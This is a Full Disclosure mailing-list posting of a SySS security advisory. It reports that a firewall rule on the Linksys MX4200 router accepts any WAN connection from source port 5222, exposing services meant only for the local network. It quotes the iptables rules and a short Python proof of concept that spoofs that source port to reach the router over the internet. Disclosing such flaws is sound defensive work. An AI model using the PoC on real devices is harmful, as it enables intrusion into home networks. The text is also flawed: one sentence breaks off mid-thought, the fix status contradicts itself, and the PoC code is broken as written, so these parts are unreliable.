Full Disclosure mailing list archives

Advisory ID:               SYSS-2025-014
Product:                   MX4200 (and potentially others)
Manufacturer:              Linksys
Affected Version(s):       1.0.13.210200 (and potentially others)
Tested Version(s):         1.0.13.210200 MX4200

Risk Level:                Critical
Solution Status:           Fixed
Manufacturer Notification: 2025-03-18
Solution Date:             2025-06-24
Public Disclosure:         2026-02-12
CVE Reference:             Not yet assigned
Author of Advisory:        Christian Zäske, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linksys MX4200 is a Wi-Fi mesh router targeting home users.

The manufacturer describes the product as follows (see [1]):

"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage
offers faster WiFi performance for lag-free online gaming and
simultaneous streaming to every device and corner of your home."

Due to an improperly configured firewall rule, the router will accept
any connection on the WAN port with the source port 5222, exposing all
services which are normally only accessible through the local network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Linksys MX4200 (and potentially other models) contains the following
iptables rules:

  -A INPUT -i eth0 -j wan2self
  -A wan2self -j wan2self_ports
  -A wan2self_ports -p tcp -m tcp --sport 5222 -j xlog_accept_wan2self
  -A xlog_accept_wan2self -j ACCEPT

This chain of rules allows any incoming packets on port eth0 (WAN port)
which originate from port 5222. This leads to the exposure of any
services listening on 0.0.0.0 to be exposed to the internet if no
additional firewall is used. This is especially critical because of

which can ultimately lead to unauthorized OS command injection over the
internet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following Python code will exploit SYSS-2025-010 over the internet:

  from socket import *
  from tlslite.api import *

  sock = socket.socket(AF_INET, SOCK_STREAM)
  sock.bind(('0.0.0.0', 5222))
  sock.connect(("203.0.113.100", 6060))

  conn = TLSConnection(sock)

The only change to SYSS-2025-010 is the fixed source port 5222 and the
endpoint. This is no longer the local IP address, but the public IP
address that is accessible via the internet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no known solution yet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-01-30: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2025-06-24: Fix published by manufacturer
2026-02-12: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Linksys MX4200
    https://support.linksys.com/kb/article/952-en/
[2] SYSS-2025-009, SYSS-2025-010 and SYSS-2025-011
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-009.txt
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-010.txt
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-011.txt
[3] SySS Security Advisory SYSS-2025-014
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-014.txt
[4] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Zäske of SySS
GmbH.

E-Mail: christian.zaeske () syss de

Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

Attachment: OpenPGP_0x7B00D164A32F9AC9.asc
Description: OpenPGP public key

Attachment: OpenPGP_signature.asc
Description: OpenPGP digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• [SYSS-2025-014] Linksys MX4200 - Improper Verification of Source of a Communication Channel Christian Zäske via Fulldisclosure (Feb 16)